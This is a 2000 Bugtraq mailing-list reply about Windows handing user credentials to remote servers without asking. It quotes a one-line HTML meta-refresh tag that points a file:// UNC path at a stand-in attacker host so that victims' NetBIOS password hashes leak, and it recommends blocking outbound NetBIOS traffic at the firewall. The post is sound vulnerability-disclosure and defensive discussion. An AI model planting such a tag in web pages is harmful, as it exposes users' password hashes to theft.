[16798] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (Bronek Kozicki)
Mon Sep 18 00:43:40 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <005301c01f40$4341d610$9e03a8c0@bronek>
Date: Fri, 15 Sep 2000 20:10:38 +0200
Reply-To: Bronek Kozicki <brok@RUBIKON.PL>
From: Bronek Kozicki <brok@RUBIKON.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
From: "Ryagin Mihail Yurevitch" <ryagin@EXTRIM.RU>
> The problem is far more general then within single poor configuration
defaults in telnet.exe.
> The main problem is that Windows automatically supply user credentials in
many situations without ever asking for his opinion.
> For example, the following html file:
> <meta http-equiv="refresh"
content="5;URL=file://\\www.hackers_site.com\test.txt">
> will automatically connect to evil site thru netbios and supply user
password hashes.
> Putting malicious site into 'Restricted Zone' doesn't helps.
That's why, exactly, you do not pass NetBIOS through your firewall -
incoming as well as _outgoing_ traffic.
Kind regards
B.
